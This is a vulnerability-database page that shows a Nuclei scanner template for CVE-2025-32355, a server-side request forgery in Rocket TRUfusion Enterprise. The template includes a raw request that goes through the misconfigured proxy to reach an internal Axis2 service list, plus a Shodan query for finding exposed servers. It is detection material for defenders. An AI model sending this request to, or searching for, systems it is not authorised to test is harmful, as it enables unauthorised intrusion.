Lucene search
K

Rocket TRUfusion Enterprise - Server Side Request Forgery

🗓️ 03 Apr 2026 07:34:23Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Rocket TRUfusion Enterprise up to 7.10.4.0 has SSRF due to a misconfigured reverse proxy that loads resources from absolute URLs.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-32355
17 Feb 202600:00
attackerkb
Circl
CVE-2025-32355
16 Feb 202620:31
circl
CNNVD
Rocket TRUfusion Enterprise 安全漏洞
17 Feb 202600:00
cnnvd
CVE
CVE-2025-32355
17 Feb 202600:00
cve
Cvelist
CVE-2025-32355
17 Feb 202600:00
cvelist
NVD
CVE-2025-32355
17 Feb 202620:22
nvd
Positive Technologies
PT-2026-20237
17 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2025-32355
18 Feb 202601:41
redhatcve
The Hacker News
⚡ Weekly Recap: Double-Tap Skimmers, PromptSpy AI, 30Tbps DDoS, Docker Malware & More
23 Feb 202613:00
thn
VulnCheck KEV
VulnCheck KEV: CVE-2025-32355
31 Mar 202600:00
vulncheck_kev
Rows per page
id: CVE-2025-32355

info:
  name: Rocket TRUfusion Enterprise - Server Side Request Forgery
  author: princechaddha,rcesecurity,DhiyaneshDk
  severity: high
  description: |
    Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.
  impact: |
    Attackers can make the proxy load arbitrary resources, potentially leading to information disclosure or further attacks.
  remediation: |
    Update to the latest version with proxy configuration fixes.
  reference:
    - https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32355
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'html:"TRUfusion Enterprise"'
  tags: cve,cve2025,rocket,trufusion,ssrf,vkev

http:
  - raw:
      - |+
        GET http://127.0.0.1:8080/axis2/services/listServices HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.5
        Connection: keep-alive

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d22c369adcde5e8a0233a677059527b3e17ad15df2348701f90a7b3f6d8337a8022005500565a64099330d8511b9ff4e3a0eec815cb801c8a92d3a57536d31e540d2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2026 09:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.3
CVSS 47.9
EPSS0.01249
SSVC
8